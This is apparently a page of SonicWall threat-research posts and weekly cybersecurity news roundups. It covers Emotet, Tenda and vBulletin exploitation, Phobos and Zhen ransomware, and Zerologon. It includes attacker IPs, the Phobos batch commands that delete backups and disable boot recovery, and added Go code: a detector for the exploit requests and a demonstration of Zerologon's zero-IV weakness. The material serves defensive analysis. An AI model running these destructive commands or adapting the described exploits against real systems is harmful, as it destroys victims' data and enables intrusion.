Posts

Modular Emotet Variant

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Emotet. Emotet is an advanced, self-propagating modular malware. Historically, Emotet was an advanced banking malware with botnet capabilities. Emotet has a variety of install sequences for many different content delivery mechanisms. It is spread mostly through phishing spam emails containing attachments. Its command and control, payloads, and delivery mechanisms change over time. Emotet first emerged in June of 2014.

Sample, Static Information:

Checking for valid values within the PE File:

Command-line Static Information:

Capabilities, Privilege Escalation and Keylogging stand out here:

Dynamic Information:

WinMain:

Processes Created, Svchost, Calc, MSpaint, and itself twice:

Pipes are used to transfer data:

Network Artifacts:

Injection into mspaint.exe, IP Address: 212.83.168.196

IP Information:

Graph:

Other EXEs that align with this sample:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Emotet.N (Trojan)

Appendix:

Sample SHA256 Hash: 5c5267ba9105ed1ebd26d50db8886030a601ffcda46fdbedf85b9a0bdc46e431

Cybersecurity News & Trends – 10-09-20

This week, cybercriminals deployed attacks on both U.S. political parties, the shipping industry, and COVID-19 researchers.


SonicWall in the News

Sonicwall Unveils Boundless 2020, Company’s Largest Ever Global Virtual Partner Event — SonicWall Press Release

  • SonicWall unveils Boundless 2020, a three-day virtual partner event hosted online Nov. 17-19. 

Marina Pharmacy Secures Its Branches With SonicWall Next-Gen Firewalls — Intelligent CIO

  • How UAE-based Marina Pharmacy’s SonicWall implementation has improved the group’s security posture and secured network connectivity across its 40 retail stores.

Surge In Ransomware Attacks Threatens Student Data — TechTarget

  • SonicWall CEO Bill Conner explains why K-12 schools are an increasingly attractive target, and why they shouldn’t give in to ransom demands.

Rethinking Cloud Security Amidst Pandemic and Mounting Threats — Digital TechMedia

  • A closer look at how the pandemic has affected cybersecurity in India and around the globe.

Industry News

Cyber Pirates Hit Global Shipping Industry Nearing Peak Season — Bloomberg

  • Two key players in the global shipping industry are trying to restore computer networks and assess the damage from separate cyberattacks just ahead of peak season.

Hackers are using DNC volunteer pitch to deliver malware, researchers warn — The Washington Times

  • Democratic National Committee messaging has been repurposed and weaponized as part of a hacking campaign spotted by cybersecurity researchers following the debate.

Ransomware: Gangs are shifting targets and upping their ransom demands — ZDNet

  • Ransomware gangs are getting smarter, factoring in companies’ revenues when determining the ransom they try to collect.

‘Mercenary’ hacker group runs rampant in Middle East, cybersecurity research shows — Reuters

  • Saudi diplomats, Sikh separatists and Indian business executives have been among those targeted by a group of hired hackers.

Phishing emails lure victims with inside info on Trump’s health — Bleeping Computer

  • A phishing campaign pushing a network-compromising backdoor pretends to have the inside scoop on President Trump’s health after being infected with COVID-19.

US warns: Big surge in Emotet malware campaigns makes it one of today’s top threats — ZDNet

  • CISA’s intrusion detection system has recorded 16,000 Emotet threats to government networks since July.

Will We Have Cyberwar or Cyber Peace? — The Wall Street Journal

  • The Wall Street Journal’s Richard Clark takes a look at what cyber warfare could look like in 2030.

Ransomware: Surge in attacks as hackers take advantage of organisations under pressure — ZDNet

  • Cyber criminals are doubling down on ransomware attacks, deploying more sophisticated campaigns at a time when remote working is already creating additional security challenges for businesses.

US brokerage firms warned of widespread survey phishing attacks — Bleeping Computer

  • The U.S. Financial Industry Regulatory Authority (FINRA) has issued a notice warning member brokerage firms of widespread phishing attacks using surveys to harvest information.

COVID-19 Clinical Trials Slowed After Ransomware Attack — Threatpost

  • The attack on eResearchTechnology potentially slowed down coronavirus research worldwide, and researchers suggest a nation-state actor could be behind the incident.

In Case You Missed It

Attackers actively targeting Tenda WiFi router vulnerability

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the arbitrary remote code execution vulnerability reported in the Tenda AC15 router. The Tenda AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking.

CVE-2020-10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. The vulnerability is due to improper validation of the deviceName input parameter: its value is passed directly to the doSystemCmd function, allowing arbitrary command execution.

Exploit:

In the exploit request captured below, the attacker passes a malicious shell command through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it.

When usb.sh is executed, it downloads more payloads from the attacker server 5.252.194.29 and executes them one by one.

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18

 

Cybersecurity News & Trends – 10-02-20

This week, attackers targeted everything from the energy sector and the U.S. elections to social media accounts and your coffeemaker.


SonicWall in the News

The 100 People You Don’t Know but Should 2020 — CRN

  • SonicWall’s Jason Carter has been selected to be part of CRN’s annual “100 People You Don’t Know but Should” list.

How Home Tech Can Be Companies’ Weakest Link — Financial Times (Business Education)

  • SonicWall President and CEO Bill Conner weighs in on how companies can protect against risks due to remote employees’ home network setups.

Managed IT Service Providers Expands Support For Remote Workers During Pandemic — Crain’s Detroit Business

  • In March, SonicWall helped Vision Computer Solutions acquire additional licenses more quickly than normal so the company could rapidly transition to remote work.

These 13 Israeli Cybersecurity Startups Have Raised a Collective $847 Million In Funding This Year For New Tools That Protect Remote Work — Business Insider

  • Perimeter 81 — which SonicWall has invested in — is included in the roundup as a cloud-based company helping IT and security professionals more easily secure remote access.

Industry News

U.S. tech giants face curbs on data sharing, digital marketplaces, under draft EU rules — Reuters

  • Google, Facebook, Amazon, Apple and other U.S. tech giants could be banned from favoring their services or forcing users to sign up to a bundle of services under draft EU rules.

House passes bills to secure energy sector against cyberattacks — The Hill

  • The House has unanimously passed four bills aimed at securing the power grid and other energy infrastructure against cyberattacks.

Microsoft looks to expose espionage groups taking aim at NGOs, US politics — Cyberscoop

  • Cyberscoop summarizes the new Microsoft report, a detailed review of criminal and government hackers’ tradecraft.

When coffee makers are demanding a ransom, you know IoT is screwed — Ars Technica

  • With the name Smarter, you might expect a network-connected kitchen appliance maker to be, well, smarter than companies selling conventional appliances. But in the case of Smarter’s IoT coffee maker, you’d be wrong.

CISA Warns of Hackers Exploiting Zerologon Vulnerability — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert to warn of attackers actively targeting a recently addressed vulnerability in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC).

Microsoft disrupts nation-state hacker op using Azure Cloud service — Bleeping Computer

  • In a report today, Microsoft said that it disrupted operations of a nation-state threat group that was using its Azure cloud infrastructure for cyberattacks.

Ransomware Attacks Take On New Urgency Ahead of Vote — The New York Times

  • Attacks against small towns, big cities and the contractors who run their voting systems have federal officials fearing that hackers will try to sow chaos around the election.

FBI director warns that Chinese hackers are still targeting US COVID-19 research — The Hill

  • FBI Director Christopher Wray said Chinese hackers are continuing to target U.S. companies involved in COVID-19 research and described China as the nation’s “greatest counterintelligence threat.”

Mount Locker ransomware joins the multi-million dollar ransom game — Bleeping Computer

  • A new ransomware operation named Mount Locker is stealing victims’ files before encrypting and then demanding multi-million dollar ransoms.

FBI Director: Feeding DOD’s Cyber Offense Operations Is Crucial to New Strategy — Nextgov

  • Senator says legislation is moving forward to thwart intellectual property theft and defend federal networks from cyberattacks.

Phishing attacks are targeting your social network accounts — Bleeping Computer

  • Scammers are targeting your social network accounts with phishing emails that pretend to be copyright violations or promises of a shiny ‘blue checkmark’ next to your name.

In Case You Missed It

Operator of new Phobos variant gives blunt response during negotiation

The SonicWall Capture Labs threat research team has observed a new variant from the Phobos ransomware family. Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model. It is spread using various infection methods such as vulnerable Remote Desktop connections and spam email attachments. In the past we have seen Phobos primarily targeting businesses. However, recently we have also seen several reports of individuals being hit with this malware. During our analysis of this malware we negotiated ransom payment with the operator.

 

Infection cycle:

 

Upon infection, the following files are dropped onto the system:

  • %APPDATA%\roaming\microsoft\windows\start menu\programs\startup\db_exec.exe [Detected as: GAV: Phobos.RSM_12 (Trojan)]
  • {malware run location}\TempWmicBatchFile.bat
  • {desktop}\info.hta
  • {desktop}\info.txt

 

Files on the system are encrypted and given the following extension:

  • id[94458690-2589].[helpisos@aol.com].isos

 

TempWmicBatchFile.bat contains the following script which, when executed, disables system recovery features:

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit

 

info.hta contains the ransom message and is displayed multiple times on the desktop:

 

info.txt also contains the ransom message:

 

Negotiation:

 

We attempted to reach out to helpisos@aol.com as instructed in the ransom note but were notified by the email server that the address “couldn’t be found, or is unable to receive mail”. We proceeded to contact @iso_recovery on Telegram and had the following conversation with the operator:

 

Nowadays, ransom fees for individuals are negotiable. We tried our luck to see how much of a discount is available:

 

We attempted to push further and enlighten the operator about our “dire financial situation” but received the following blunt response:

 

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Phobos.RSM_12 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CVE-2020-17496 – vBulletin RCE vulnerability actively being exploited in the wild

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. vBulletin is a popular forum software package used by about 20,000 websites. It is written in PHP and uses the MySQL database.

CVE-2020-17496 | Vulnerability:

A remote code execution vulnerability has been reported in vBulletin. This vulnerability is due to improper validation of subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. It is a bypass for CVE-2019-16759, a critical pre-authentication vulnerability in vBulletin that was disclosed in September 2019. When an attacker sends a crafted ajax request that contains the template name widget_php with malicious code placed in the parameter widgetConfig['code'], the render engine executes the malicious code in the request. That issue was fixed by checking the template name: if the name is widget_php, the engine refuses to render the requested template. That made widget_php the only template that could be used for PHP code execution. In the latest bypass, the tabbedcontainer_tab_panel template widget was found to be capable of loading a user-controlled child template, effectively bypassing the patch for CVE-2019-16759.

Exploit:

In the POST request below, the child template name is widget_php and the malicious code can be passed through subWidgets elements, allowing remote code execution.

 

 

A remote, unauthenticated attacker could exploit this vulnerability by sending the above crafted request to the vulnerable server. Successful exploitation could result in remote code execution.
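As an added example (not SonicWall's code, nor either vendor's), the following Go program turns the two request shapes described on this page, the Tenda setUsbUnload deviceName command injection above and the vBulletin tabbedcontainer child template here, into detection rules and runs them over constructed sample requests. The deviceName allowlist, the subWidgets[0][template] parameter layout and the sample values widget_text and PLACEHOLDER are assumptions, not values taken from captured traffic.

```go
package main

import (
	"bufio"
	"fmt"
	"net/http"
	"regexp"
	"strings"
)

// deviceNameOK is the allowlist the Tenda handler should have enforced before
// passing deviceName to doSystemCmd. Assumption: USB device names are short
// identifiers and never need shell metacharacters.
var deviceNameOK = regexp.MustCompile(`^[A-Za-z0-9_-]{1,64}$`)

// inspect parses one raw HTTP request and returns the rule that fired, or ""
// when nothing matched. Query-string and body parameters are both checked
// because ParseForm merges them into req.Form.
func inspect(raw string) (string, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return "", err
	}
	if err := req.ParseForm(); err != nil {
		// Recent Go versions reject raw ';' separators in form data; a body
		// that fails to parse is itself worth surfacing rather than dropping.
		return "malformed form data: " + err.Error(), nil
	}
	switch {
	case strings.HasSuffix(req.URL.Path, "/goform/setUsbUnload"):
		// CVE-2020-10987: deviceName reaches doSystemCmd without validation,
		// so anything outside the allowlist is treated as an injection attempt.
		if name := req.Form.Get("deviceName"); name != "" && !deviceNameOK.MatchString(name) {
			return "CVE-2020-10987: setUsbUnload deviceName outside allowlist", nil
		}
	case strings.Contains(req.URL.Path, "ajax/render/widget_tabbedcontainer_tab_panel"):
		// CVE-2020-17496: the tabbed container loads a child template named in
		// subWidgets, and widget_php is the only template that executes PHP.
		for key, vals := range req.Form {
			if !strings.HasPrefix(key, "subWidgets") {
				continue
			}
			for _, v := range vals {
				if strings.EqualFold(v, "widget_php") {
					return "CVE-2020-17496: widget_php child template via subWidgets", nil
				}
			}
		}
	}
	return "", nil
}

// post builds a raw form POST with a correct Content-Length (constructed
// sample traffic, not a captured exploit).
func post(path, body string) string {
	return fmt.Sprintf("POST %s HTTP/1.1\r\nHost: 192.0.2.1\r\n"+
		"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s",
		path, len(body), body)
}

// samples are constructed requests: one benign and one suspect per CVE. The
// parameter layout subWidgets[0][template] and the values widget_text and
// PLACEHOLDER are assumptions, not captured data.
var samples = []struct{ label, raw string }{
	{"tenda benign", post("/goform/setUsbUnload", "deviceName=sda1")},
	{"tenda suspect", post("/goform/setUsbUnload", "deviceName=sda1%3BPLACEHOLDER")},
	{"vbulletin benign", post("/ajax/render/widget_tabbedcontainer_tab_panel",
		"subWidgets[0][template]=widget_text")},
	{"vbulletin suspect", post("/ajax/render/widget_tabbedcontainer_tab_panel",
		"subWidgets[0][template]=widget_php")},
}

func main() {
	for _, s := range samples {
		hit, err := inspect(s.raw)
		if err != nil {
			hit = "parse error: " + err.Error()
		} else if hit == "" {
			hit = "no finding"
		}
		fmt.Printf("%-18s %s\n", s.label, hit)
	}
}
```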

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15163 vBulletin widget_tabbedContainer_tab_panel Remote Command Execution

Affected Products:

All versions of vBulletin prior to 5.6.x are affected by this vulnerability. Users should migrate to a patched version as soon as possible.

Zhen ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild.

The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Name].Zhen (encrypted file)
    • %App.path%\payment request.txt (recovery instructions)

Once the computer is compromised, the ransomware runs the following commands:  (Actual Source code)

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [Zhen] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: ZHEN.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 09-25-20

This week, foreign hackers made headlines for targeting everything from COVID-19 research, to NASA, to the U.S. presidential election.


SonicWall in the News

Top 5 CyberSecurity Innovations and Why They’re Drawing In The Money — TechGenix

  • SonicWall’s product with Perimeter 81 was included in the article as an innovation in the zero-trust sector.

ChannelPro Weekly Podcast: Episode #157 – The New M&A (Mongrels & Animals) — ChannelPro Weekly

  • In its weekly news podcast, ChannelPro Network discussed SonicWall’s 7th generation of security products.

Coronavirus Puts Security At The Heart Of The Agenda — MicroScope

  • Terry Greer-King, vice-president for EMEA at SonicWall, says the “mass shift” from working within the corporate perimeter to working from home has made everyone inherently less secure, ushering in an era of “boundless cyber security.”

Making Work-From-Home Security Work — ChannelPro Network

  • In an article about how to successfully and securely work from home, SonicWall’s data on the increase in ransomware from the midyear update to the 2020 Cyber Threat Report is included to showcase the dangers of ransomware attacks.

Industry News

U.S. warns ‘foreign actors’ aim to sow doubts over mail-in voting — Reuters

  • U.S. federal law enforcement and cybersecurity agencies on Tuesday warned that “foreign actors” will likely try to discredit the November presidential election by taking advantage of the slow counting of mail-in ballots.

UK Govt Advisor Warns: Universities the Latest Frontier for Cybercriminals — IT Supply Chain

  • Students’ return to universities has coincided with a spate of attacks against academic institutions across the North of England, prompting the National Cyber Security Centre to issue a warning: Prepare for disruption as the term starts.

FBI Opens China-Related Counterintelligence Case Every 10 Hours — SC Media

  • FBI Director Christopher Wray offered the House Homeland Security Committee some sobering news about China: the FBI opens a new China-related counterintelligence case roughly every 10 hours.

Ransomware gang targets Russian businesses in rare coordinated attacks — ZDNet

  • Group breaks an unofficial rule in the cybercrime underground not to target the former Soviet space.

Lessons from the ransomware death: Prioritize cyber emergency preparedness — SC Magazine

  • The death of a woman, at least in part due to a ransomware attack, has placed security teams on high alert.

“LokiBot,” the malware that steals your most sensitive data, is on the rise — Ars Technica

  • Officials are seeing a big uptick in infections coming from LokiBot, an open-source DIY malware package that’s openly sold or traded in underground forums. It steals passwords and cryptocurrency wallets, and can also download and install new malware.

The dark web won’t hide you anymore, police warn crooks — ZDNet

  • ‘Operation Disruptor’ involved agencies from nine countries and resulted in the seizure of over $6.5m in cash and cryptocurrencies, as criminals are warned law enforcement will track them down.

Healthcare lags behind in critical vulnerability management, banks hold their ground — ZDNet

  • New research sheds light on which industries are performing well when it comes to patching high-risk bugs.

Officials say NASA facing increased targeting by foreign and domestic hackers — The Hill

  • Top officials at NASA say the agency is facing increasing attempts by foreign hackers to target sensitive information as it works to improve its IT security during the COVID-19 pandemic.

FBI sounds alarm on rampant personal-data theft by China-backed hackers — The Washington Times

  • China is engaged in massive data mining in the U.S. and likely has stolen personal information on nearly half of the entire U.S. population, FBI Director Christopher Wray revealed.

Chinese and Russian hackers pose ‘very, very real threat’ to COVID-19 research: FBI Director Wray — The Washington Times

  • Foreign hackers searching for ways to steal coronavirus research remain a “very, very real cyber threat,” FBI Director Christopher A. Wray told the House Homeland Security Committee.

U.K. warns of surge in ransomware threats against education sector — Bleeping Computer

  • The U.K. National Cyber Security Centre has issued an alert about a surge in ransomware targeting educational institutions, urging them to follow new recommendations for mitigating attacks.

In Case You Missed It

Cybersecurity News & Trends – 09-18-20

Between legislation to protect government IoT devices, developments in the TikTok saga and Supreme Court arguments, what’s happening at the federal level this week could have far-reaching implications for cybersecurity.


SonicWall in the News

Politics in the Technology World Order — Verdict Magazine
SonicWall President and CEO Bill Conner weighs in on the future of the U.S. data privacy landscape.

Perimeter 81 Looks To Take Firewall Appliances Out — Security Boulevard
SonicWall, an investor in Perimeter 81’s recent funding round, has partnered with the firm on its firewall-as-a-service software.

Sectigo to Be Acquired by GI Partners — Sectigo Press Release
In a comment about the acquisition, SonicWall President, CEO and Sectigo Board Chairman Bill Conner said, “The future is bright for Sectigo as the company builds on its impressive position as a digital identity and web security solutions leader.”


Industry News

This security awareness training email is actually a phishing scam — Bleeping Computer
A creative phishing campaign spoofs a well-known security company in an email pretending to be a reminder to complete security awareness training.

Oracle-TikTok Deal to Undergo U.S. Security Review — The Wall Street Journal
The Treasury Department said it would review an agreement for Oracle and others to revamp TikTok’s U.S. operations, with the aim of avoiding a ban of the popular video-sharing app.

House approves bill to secure internet-connected federal devices against cyber threats — The Hill
The Internet of Things (IoT) Cybersecurity Improvement Act, passed unanimously by the House, would require all internet-connected devices purchased by the federal government to comply with minimum security recommendations.

Hackers are getting more hands-on with their attacks. That’s not a good sign — ZDNet
Both nation-state-backed hackers and cybercriminals are trying to take advantage of the rise in remote working — and getting more sophisticated in their approach.

LockBit ransomware launches data leak site to double-extort victims — Bleeping Computer
The LockBit ransomware gang has launched a new data leak site to be used as part of their double extortion strategy to scare victims into paying a ransom.

Zerologon attack lets hackers take over enterprise networks — ZDNet
If you’re managing enterprise Windows servers, don’t skip on the August 2020 Patch.

Security researchers slam Voatz brief to the Supreme Court on anti-hacking law — Cyberscoop
The Supreme Court is about to take up a case with major implications for computer research — and a group of high-profile cybersecurity specialists doesn’t want mobile voting firm Voatz to have the last word.

Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods — The Register
Over the past 12 months, the Australian Cyber Security Centre has observed real-world impacts of ransomware incidents, which have typically originated from a user executing a file received as part of a spearphishing campaign.

Russian Intelligence Hackers Are Back, Microsoft Warns, Aiming at Officials of Both Parties — The New York Times
China is also growing more adept at targeting campaign workers, with Beijing mostly aiming at Biden campaign officials.

Iran Says US Vote Hack Allegation ‘Absurd’ — Security Week
Tehran on Friday hit back at allegations by Microsoft that Iran-based hackers had targeted the U.S. presidential campaigns.

Treasury Dept. sanctions Russian, Ukrainian individuals for election interference — The Hill
The Treasury Department has added four Russian and Ukrainian individuals to its specially designated nationals list, citing attempts by the individuals to interfere in U.S. elections.


In Case You Missed It

Windows Netlogon Elevation of Privilege Vulnerability CVE-2020-1472

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a network device.
This vulnerability, also called Zerologon, has a CVSS score of 10.

Netlogon Remote Protocol

The Netlogon Remote Protocol is used for secure communication between machines in a domain and domain controllers (DCs). The communication is secured by using a shared session key computed between the client and the DC that is engaged in the secure communication. The session key is computed by using a preconfigured shared secret that is known to the client and the DC. The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) is a core authentication component of Active Directory that provides authentication for user and computer accounts.

Vulnerability (CVE-2020-1472)

The vulnerability arises from a flaw in the cryptographic implementation of the Netlogon protocol, specifically in its usage of AES-CFB8 encryption. MS-NRPC uses an initialization vector (IV) of 0 (zero) in AES-CFB8 mode when authenticating computer accounts. Due to this incorrect use of an AES mode of operation, it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain.

The successful exploitation of the vulnerability will allow an attacker to

  • Impersonate any computer on the network,
  • Disable security features that protect the Netlogon process
  • Change a computer’s password associated with its Active Directory account.
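To show why the zero IV matters, here is an added example (not SonicWall's code and not part of the original post) that implements AES-CFB8 with Go's standard library and surveys derived keys: with the zero IV, an all-zero 8-byte plaintext encrypts to an all-zero ciphertext for about 1 key in 256, exactly when the first byte of AES_k(0) is zero, whereas with a distinct IV per key it never does. Deriving keys and IVs from a counter is an assumption made only so the survey is reproducible.

```go
package main

import (
	"crypto/aes"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// cfb8 runs AES-CFB8: encrypt the 16-byte register, XOR its first byte with one
// data byte, shift the ciphertext byte in. Decryption feeds the input byte back.
func cfb8(key, iv, data []byte, encrypt bool) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	reg := make([]byte, aes.BlockSize)
	copy(reg, iv)
	ks := make([]byte, aes.BlockSize)
	out := make([]byte, len(data))
	for i, b := range data {
		block.Encrypt(ks, reg)
		out[i] = b ^ ks[0]
		fed := out[i] // ciphertext byte goes into the register
		if !encrypt {
			fed = b // when decrypting, b already is the ciphertext byte
		}
		copy(reg, reg[1:]) // shift the register left by one byte
		reg[aes.BlockSize-1] = fed
	}
	return out
}

func allZero(b []byte) bool {
	for _, x := range b {
		if x != 0 {
			return false
		}
	}
	return true
}

// keyFor derives a reproducible key and a distinct IV from a counter (an
// assumption so the survey needs no randomness; real keys come from the secret).
func keyFor(n int) (key, iv []byte) {
	var seed [8]byte
	binary.BigEndian.PutUint64(seed[:], uint64(n))
	sum := sha256.Sum256(seed[:])
	return sum[:16], sum[16:]
}

// zeroIVZeroCiphertext: does the 8-byte all-zero plaintext encrypt to all zeros
// under key with the all-zero IV that MS-NRPC used for computer accounts?
func zeroIVZeroCiphertext(key []byte) bool {
	return allZero(cfb8(key, make([]byte, aes.BlockSize), make([]byte, 8), true))
}

// firstKeystreamByteZero is the reason behind the flaw: with a zero IV and zero
// plaintext the register never changes once the first output byte is zero, so
// the whole ciphertext is zero exactly when AES_k(0^16)[0] == 0, 1 key in 256.
func firstKeystreamByteZero(key []byte) bool {
	return cfb8(key, make([]byte, aes.BlockSize), []byte{0}, true)[0] == 0
}

// countZeroCiphertexts surveys n derived keys with either the fixed zero IV or
// a per-key IV and counts all-zero ciphertexts of the zero plaintext.
func countZeroCiphertexts(n int, zeroIV bool) int {
	hits := 0
	for i := 0; i < n; i++ {
		key, iv := keyFor(i)
		if zeroIV {
			iv = make([]byte, aes.BlockSize)
		}
		if allZero(cfb8(key, iv, make([]byte, 8), true)) {
			hits++
		}
	}
	return hits
}

func main() {
	n := 10000
	fmt.Printf("all-zero ciphertexts: zero IV %d/%d (about 1 in 256), per-key IV %d/%d\n",
		countZeroCiphertexts(n, true), n, countZeroCiphertexts(n, false), n)
}
```

Because the attacker controls the client challenge, a 1-in-256 chance per attempt is all that stands between an anonymous caller and a valid computer credential, which is why Microsoft's patch enforces secure RPC rather than changing the IV alone.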

Affected products

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

Microsoft has patched this vulnerability and is urging customers to prioritize patching domain controllers, as these are the likely primary target.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15143: Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 1
  • IPS 15156: Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 2
  • IPS 15158: Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 3